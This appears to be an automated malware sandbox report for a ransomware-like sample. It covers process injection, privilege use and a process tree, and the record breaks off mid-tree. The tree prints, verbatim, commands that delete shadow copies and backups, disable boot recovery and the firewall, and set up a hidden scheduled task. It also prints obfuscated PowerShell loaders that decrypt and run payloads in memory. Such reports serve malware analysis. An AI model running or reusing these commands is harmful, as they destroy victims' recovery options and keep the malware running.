Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ldx999sx.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ldx999sx.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ldx999sx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe

Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

4404 vssadmin.exe
3784 vssadmin.exe

pid	process
4404	vssadmin.exe
3784	vssadmin.exe

Modifies registry class 2 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
Key created	\REGISTRY\USER\S-1-5-21-3592352177-2971570228-3741369827-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exe

pid	process
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3096
Suspicious behavior: MapViewOfSection 31 IoCs

Processes:

ldx999sx.exe

pid process

3684 ldx999sx.exe
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096

pid	process
3096

pid	process
3684	ldx999sx.exe
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096
3096

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeaspnet_compiler.exe156D.exevssvc.exe3A1E.exewbengine.exe1201.exe

description	pid	process
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeShutdownPrivilege	4572	powershell.exe
Token: SeCreatePagefilePrivilege	4572	powershell.exe
Token: SeDebugPrivilege	4860	aspnet_compiler.exe
Token: SeShutdownPrivilege	3096
Token: SeCreatePagefilePrivilege	3096
Token: SeDebugPrivilege	5056	156D.exe
Token: SeBackupPrivilege	4984	vssvc.exe
Token: SeRestorePrivilege	4984	vssvc.exe
Token: SeAuditPrivilege	4984	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1448	3A1E.exe
Token: SeSecurityPrivilege	1448	3A1E.exe
Token: SeTakeOwnershipPrivilege	1448	3A1E.exe
Token: SeLoadDriverPrivilege	1448	3A1E.exe
Token: SeSystemProfilePrivilege	1448	3A1E.exe
Token: SeSystemtimePrivilege	1448	3A1E.exe
Token: SeProfSingleProcessPrivilege	1448	3A1E.exe
Token: SeIncBasePriorityPrivilege	1448	3A1E.exe
Token: SeCreatePagefilePrivilege	1448	3A1E.exe
Token: SeBackupPrivilege	1448	3A1E.exe
Token: SeRestorePrivilege	1448	3A1E.exe
Token: SeShutdownPrivilege	1448	3A1E.exe
Token: SeDebugPrivilege	1448	3A1E.exe
Token: SeSystemEnvironmentPrivilege	1448	3A1E.exe
Token: SeRemoteShutdownPrivilege	1448	3A1E.exe
Token: SeUndockPrivilege	1448	3A1E.exe
Token: SeManageVolumePrivilege	1448	3A1E.exe
Token: 33	1448	3A1E.exe
Token: 34	1448	3A1E.exe
Token: 35	1448	3A1E.exe
Token: 36	1448	3A1E.exe
Token: SeShutdownPrivilege	3096
Token: SeCreatePagefilePrivilege	3096
Token: SeIncreaseQuotaPrivilege	1448	3A1E.exe
Token: SeSecurityPrivilege	1448	3A1E.exe
Token: SeTakeOwnershipPrivilege	1448	3A1E.exe
Token: SeLoadDriverPrivilege	1448	3A1E.exe
Token: SeSystemProfilePrivilege	1448	3A1E.exe
Token: SeSystemtimePrivilege	1448	3A1E.exe
Token: SeProfSingleProcessPrivilege	1448	3A1E.exe
Token: SeIncBasePriorityPrivilege	1448	3A1E.exe
Token: SeCreatePagefilePrivilege	1448	3A1E.exe
Token: SeBackupPrivilege	1448	3A1E.exe
Token: SeRestorePrivilege	1448	3A1E.exe
Token: SeShutdownPrivilege	1448	3A1E.exe
Token: SeDebugPrivilege	1448	3A1E.exe
Token: SeSystemEnvironmentPrivilege	1448	3A1E.exe
Token: SeRemoteShutdownPrivilege	1448	3A1E.exe
Token: SeUndockPrivilege	1448	3A1E.exe
Token: SeManageVolumePrivilege	1448	3A1E.exe
Token: 33	1448	3A1E.exe
Token: 34	1448	3A1E.exe
Token: 35	1448	3A1E.exe
Token: 36	1448	3A1E.exe
Token: SeBackupPrivilege	924	wbengine.exe
Token: SeRestorePrivilege	924	wbengine.exe
Token: SeSecurityPrivilege	924	wbengine.exe
Token: SeShutdownPrivilege	3096
Token: SeCreatePagefilePrivilege	3096
Token: SeDebugPrivilege	5100	1201.exe
Token: SeShutdownPrivilege	3096
Token: SeCreatePagefilePrivilege	3096
Token: SeShutdownPrivilege	3096
Token: SeCreatePagefilePrivilege	3096

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a.exepowershell.exeaspnet_compiler.exeldx999sx.exe156D.execmd.execmd.exe

description	pid	process	target process
PID 3880 wrote to memory of 4572	3880	160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a.exe	powershell.exe
PID 3880 wrote to memory of 4572	3880	160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a.exe	powershell.exe
PID 3880 wrote to memory of 4572	3880	160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a.exe	powershell.exe
PID 4572 wrote to memory of 4860	4572	powershell.exe	aspnet_compiler.exe
PID 4572 wrote to memory of 4860	4572	powershell.exe	aspnet_compiler.exe
PID 4572 wrote to memory of 4860	4572	powershell.exe	aspnet_compiler.exe
PID 4572 wrote to memory of 4860	4572	powershell.exe	aspnet_compiler.exe
PID 4572 wrote to memory of 4860	4572	powershell.exe	aspnet_compiler.exe
PID 4572 wrote to memory of 4860	4572	powershell.exe	aspnet_compiler.exe
PID 4572 wrote to memory of 4860	4572	powershell.exe	aspnet_compiler.exe
PID 4572 wrote to memory of 4860	4572	powershell.exe	aspnet_compiler.exe
PID 4860 wrote to memory of 3560	4860	aspnet_compiler.exe	ldx999sx.exe
PID 4860 wrote to memory of 3560	4860	aspnet_compiler.exe	ldx999sx.exe
PID 4860 wrote to memory of 3560	4860	aspnet_compiler.exe	ldx999sx.exe
PID 4860 wrote to memory of 3708	4860	aspnet_compiler.exe	s777mx.exe
PID 4860 wrote to memory of 3708	4860	aspnet_compiler.exe	s777mx.exe
PID 4860 wrote to memory of 3708	4860	aspnet_compiler.exe	s777mx.exe
PID 3560 wrote to memory of 3684	3560	ldx999sx.exe	ldx999sx.exe
PID 3560 wrote to memory of 3684	3560	ldx999sx.exe	ldx999sx.exe
PID 3560 wrote to memory of 3684	3560	ldx999sx.exe	ldx999sx.exe
PID 3560 wrote to memory of 3684	3560	ldx999sx.exe	ldx999sx.exe
PID 3560 wrote to memory of 3684	3560	ldx999sx.exe	ldx999sx.exe
PID 3560 wrote to memory of 3684	3560	ldx999sx.exe	ldx999sx.exe
PID 3096 wrote to memory of 5100	3096		1201.exe
PID 3096 wrote to memory of 5100	3096		1201.exe
PID 3096 wrote to memory of 5056	3096		156D.exe
PID 3096 wrote to memory of 5056	3096		156D.exe
PID 3096 wrote to memory of 5056	3096		156D.exe
PID 3096 wrote to memory of 4116	3096		1BB8.exe
PID 3096 wrote to memory of 4116	3096		1BB8.exe
PID 3096 wrote to memory of 4116	3096		1BB8.exe
PID 5056 wrote to memory of 4532	5056	156D.exe	cmd.exe
PID 5056 wrote to memory of 4532	5056	156D.exe	cmd.exe
PID 5056 wrote to memory of 3968	5056	156D.exe	cmd.exe
PID 5056 wrote to memory of 3968	5056	156D.exe	cmd.exe
PID 3968 wrote to memory of 2100	3968	cmd.exe	netsh.exe
PID 3968 wrote to memory of 2100	3968	cmd.exe	netsh.exe
PID 4532 wrote to memory of 4404	4532	cmd.exe	vssadmin.exe
PID 4532 wrote to memory of 4404	4532	cmd.exe	vssadmin.exe
PID 3096 wrote to memory of 368	3096		3A1E.exe
PID 3096 wrote to memory of 368	3096		3A1E.exe
PID 3096 wrote to memory of 368	3096		3A1E.exe
PID 3968 wrote to memory of 3764	3968	cmd.exe	netsh.exe
PID 3968 wrote to memory of 3764	3968	cmd.exe	netsh.exe
PID 3096 wrote to memory of 3648	3096		explorer.exe
PID 3096 wrote to memory of 3648	3096		explorer.exe
PID 3096 wrote to memory of 3648	3096		explorer.exe
PID 3096 wrote to memory of 3648	3096		explorer.exe
PID 3096 wrote to memory of 4672	3096		explorer.exe
PID 3096 wrote to memory of 4672	3096		explorer.exe
PID 3096 wrote to memory of 4672	3096		explorer.exe
PID 3096 wrote to memory of 2096	3096		explorer.exe
PID 3096 wrote to memory of 2096	3096		explorer.exe
PID 3096 wrote to memory of 2096	3096		explorer.exe
PID 3096 wrote to memory of 2096	3096		explorer.exe
PID 4532 wrote to memory of 1448	4532	cmd.exe	WMIC.exe
PID 4532 wrote to memory of 1448	4532	cmd.exe	WMIC.exe
PID 3096 wrote to memory of 360	3096		explorer.exe
PID 3096 wrote to memory of 360	3096		explorer.exe
PID 3096 wrote to memory of 360	3096		explorer.exe
PID 3096 wrote to memory of 360	3096		explorer.exe
PID 3096 wrote to memory of 4448	3096		explorer.exe
PID 3096 wrote to memory of 4448	3096		explorer.exe
PID 3096 wrote to memory of 4448	3096		explorer.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3592352177-2971570228-3741369827-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

outlook_win_path 1 IoCs

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3592352177-2971570228-3741369827-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

C:\Users\Admin\AppData\Local\Temp\160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a.exe
"C:\Users\Admin\AppData\Local\Temp\160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
2⤵
- Blocklisted process makes network request
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4572

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4860

C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
"C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3560

C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
"C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe"
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3684

C:\Users\Admin\AppData\Local\Temp\s777mx.exe
"C:\Users\Admin\AppData\Local\Temp\s777mx.exe"
4⤵
- Executes dropped EXE
PID:3708

C:\Users\Admin\AppData\Local\Temp\1201.exe
C:\Users\Admin\AppData\Local\Temp\1201.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:5100

C:\Users\Admin\AppData\Local\Temp\156D.exe
C:\Users\Admin\AppData\Local\Temp\156D.exe
1⤵
- Deletes itself
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5056

C:\Users\Admin\AppData\Local\Temp\156D.exe
"C:\Users\Admin\AppData\Local\Temp\156D.exe"
2⤵
- Executes dropped EXE
PID:872

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:4532

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:4404

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
PID:1448

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
3⤵
- Modifies boot configuration data using bcdedit
PID:4844

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
3⤵
- Modifies boot configuration data using bcdedit
PID:3260

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
3⤵
- Deletes backup catalog
PID:2524

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3968

C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
3⤵
- Modifies Windows Firewall
PID:2100

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=disable
3⤵
- Modifies Windows Firewall
PID:3764

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2⤵
PID:268

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2⤵
PID:1744

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2⤵
PID:3084

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "F:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
2⤵
PID:3712

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
2⤵
PID:3816

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3784

C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
PID:4520

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
3⤵
- Modifies boot configuration data using bcdedit
PID:4240

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
3⤵
- Modifies boot configuration data using bcdedit
PID:3472

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
3⤵
- Deletes backup catalog
PID:2720

C:\Users\Admin\AppData\Local\Temp\1BB8.exe
C:\Users\Admin\AppData\Local\Temp\1BB8.exe
1⤵
- Executes dropped EXE
PID:4116

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4984

C:\Users\Admin\AppData\Local\Temp\3A1E.exe
C:\Users\Admin\AppData\Local\Temp\3A1E.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
PID:368

C:\Users\Admin\AppData\Local\Temp\3A1E.exe
"C:\Users\Admin\AppData\Local\Temp\3A1E.exe"
2⤵
PID:4416

C:\Users\Admin\AppData\Local\Temp\3A1E.exe
"C:\Users\Admin\AppData\Local\Temp\3A1E.exe"
2⤵
PID:4212

C:\Users\Admin\AppData\Local\Temp\3A1E.exe
"C:\Users\Admin\AppData\Local\Temp\3A1E.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SRD.bat" "
3⤵
PID:3288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\SRD.bat"
4⤵
PID:264

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe
"C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe" -w hidden -c $RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');function RcHQK($SJfnN){$ePbJG=[System.Security.Cryptography.Aes]::Create();$ePbJG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ePbJG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ePbJG.Key=[System.Convert]::$QupE('JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=');$ePbJG.IV=[System.Convert]::$QupE('TPQFXcwHNdZ9KljZbDDnEA==');$uQtJU=$ePbJG.$IGVN();$QRiSY=$uQtJU.$fwfx($SJfnN,0,$SJfnN.Length);$uQtJU.Dispose();$ePbJG.Dispose();$QRiSY;}function nTqSF($SJfnN){$vKyUA=New-Object System.IO.MemoryStream(,$SJfnN);$flWoW=New-Object System.IO.MemoryStream;$gLlPI=New-Object System.IO.Compression.GZipStream($vKyUA,[IO.Compression.CompressionMode]::Decompress);$gLlPI.CopyTo($flWoW);$gLlPI.Dispose();$vKyUA.Dispose();$flWoW.Dispose();$flWoW.ToArray();}$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ([System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);$JMYTy=$fsXoM.Substring(2).$tMEM(':');$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));$Prmhn=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[1])));[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);
5⤵
PID:984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SRD')
6⤵
PID:952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(984);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
6⤵
PID:4284

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_TbvDl' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\TbvDl.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
6⤵
PID:4288

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\TbvDl.vbs"
6⤵
PID:3172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\TbvDl.cmd" "
7⤵
PID:764

C:\Users\Admin\AppData\Roaming\TbvDl.cmd.exe
"C:\Users\Admin\AppData\Roaming\TbvDl.cmd.exe" -w hidden -c $RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');function RcHQK($SJfnN){$ePbJG=[System.Security.Cryptography.Aes]::Create();$ePbJG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ePbJG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ePbJG.Key=[System.Convert]::$QupE('JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=');$ePbJG.IV=[System.Convert]::$QupE('TPQFXcwHNdZ9KljZbDDnEA==');$uQtJU=$ePbJG.$IGVN();$QRiSY=$uQtJU.$fwfx($SJfnN,0,$SJfnN.Length);$uQtJU.Dispose();$ePbJG.Dispose();$QRiSY;}function nTqSF($SJfnN){$vKyUA=New-Object System.IO.MemoryStream(,$SJfnN);$flWoW=New-Object System.IO.MemoryStream;$gLlPI=New-Object System.IO.Compression.GZipStream($vKyUA,[IO.Compression.CompressionMode]::Decompress);$gLlPI.CopyTo($flWoW);$gLlPI.Dispose();$vKyUA.Dispose();$flWoW.Dispose();$flWoW.ToArray();}$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ([System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);$JMYTy=$fsXoM.Substring(2).$tMEM(':');$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));$Prmhn=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[1])));[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);
8⤵
PID:3764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\TbvDl')
9⤵
PID:4552

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3764);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
9⤵
PID:4492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sv.bat" "
3⤵
PID:4240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\sv.bat"
4⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe
"C:\Users\Admin\AppData\Local\Temp\sv.bat.exe" -w hidden -c $QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');$Cvyq='LowQysadwQys'.Replace('wQys', '');$Abka='GetwQysCurwQysrenwQystwQysProwQyscewQyssswQys'.Replace('wQys', '');$kkEJ='CrwQyseawQystewQysDewQyscrwQysyptwQysorwQys'.Replace('wQys', '');$uvnc='FrwQysomwQysBaswQyse64wQysStrwQysinwQysgwQys'.Replace('wQys', '');$oAYO='EwQysnwQystryPwQysowQysinwQystwQys'.Replace('wQys', '');$eVXi='ChawQysnwQysgewQysExwQystenwQyssiwQysowQysnwQys'.Replace('wQys', '');$KwUx='MwQysainwQysMowQysdwQysulwQysewQys'.Replace('wQys', '');$Nyws='InvowQyskewQys'.Replace('wQys', '');$JsiC='RwQyseadwQysLiwQysnewQysswQys'.Replace('wQys', '');$xxaz='SwQyspwQysliwQystwQys'.Replace('wQys', '');$OtLn='TrawQysnsfwQysormwQysFinwQysalwQysBlocwQyskwQys'.Replace('wQys', '');function coZUI($OpQVj){$aZVET=[System.Security.Cryptography.Aes]::Create();$aZVET.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aZVET.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aZVET.Key=[System.Convert]::$uvnc('iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A=');$aZVET.IV=[System.Convert]::$uvnc('NkX2UOU09KDD8//UYPJBsg==');$RGpCI=$aZVET.$kkEJ();$aARwL=$RGpCI.$OtLn($OpQVj,0,$OpQVj.Length);$RGpCI.Dispose();$aZVET.Dispose();$aARwL;}function fvMWD($OpQVj){$EEpkF=New-Object System.IO.MemoryStream(,$OpQVj);$pDChj=New-Object System.IO.MemoryStream;$BBOEV=New-Object System.IO.Compression.GZipStream($EEpkF,[IO.Compression.CompressionMode]::Decompress);$BBOEV.CopyTo($pDChj);$BBOEV.Dispose();$EEpkF.Dispose();$pDChj.Dispose();$pDChj.ToArray();}$YoalJ=[System.Linq.Enumerable]::$QmQC([System.IO.File]::$JsiC([System.IO.Path]::$eVXi([System.Diagnostics.Process]::$Abka().$KwUx.FileName, $null)), 1);$ZnOcq=$YoalJ.Substring(2).$xxaz(':');$njBYj=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[0])));$BkieQ=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[1])));[System.Reflection.Assembly]::$Cvyq([byte[]]$BkieQ).$oAYO.$Nyws($null,$null);[System.Reflection.Assembly]::$Cvyq([byte[]]$njBYj).$oAYO.$Nyws($null,$null);
5⤵
PID:3152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sv')
6⤵
PID:4484

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
